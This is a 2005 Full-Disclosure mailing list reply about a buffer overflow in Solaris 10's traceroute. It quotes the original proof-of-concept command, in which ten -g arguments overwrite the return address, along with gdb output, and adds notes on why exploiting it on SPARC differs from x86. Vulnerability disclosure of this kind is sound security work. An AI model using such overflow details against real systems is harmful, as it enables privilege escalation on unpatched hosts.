Re: Solaris 10 /usr/sbin/traceroute vulnerabilities

["Fermín J. Serna" <fjserna () ngsec com>]

Hello,

Please note his tests were on X86, SPARC needs double ret in order to 
successfuly xploit/segfault the vulnearable program due to register 
windows layout on stack.

Its like xfont (x-something, don't remember) issues on old solaris, 
exploitable (segfault) on x86 but not on SPARC because it does exit 
after the first ret, so there is no double ret chance.

Best regards,

David T. Moraski II wrote:
> On Fri, 24 Jun 2005, Przemyslaw Frasunek wrote:
>
>
> > /usr/sbin/traceroute from Solaris 10 is vulnerable to buffer overflow in
> > handling -g argument. After supplying 10 -g parameters, return address is
> > overwritten by IP address argument:
> >
> > atari:root:/home/venglin# /usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g
> > 7 -g 8 -g 9 -g 10 127.0.0.1
> > traceroute: too many IPv4 gateways
> > traceroute: unknown IPv4 host 1
> > traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 88 byte packets
> > Segmentation fault (core dumped)
> >
> > atari:root:/home/venglin# gdb /usr/sbin/traceroute core
> > [...]
> > Core was generated by `/usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g 7
> > -g 8 -g 9 -g 10 127.0.0'.
> > Program terminated with signal 11, Segmentation fault.
> > [...]
> > #0  0x0100007f in ?? ()
> >
> > 0x0100007f is of course 127.0.0.1.
>
>
> I ran the above command line on a Solaris 10 system, both as root and a
> regular user, and was unable to reproduce your results; traceroute did not
> segfault or produce a core file.  What was your patch level?

--
Femín J. Serna @ NGSEC
http://www.ngsec.com

C\O´Donnell nº 46, 3ºB
28009 Madrid
Spain
Telf.: +34 91 435 56 27
Fax.: +34 91 577 84 45
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/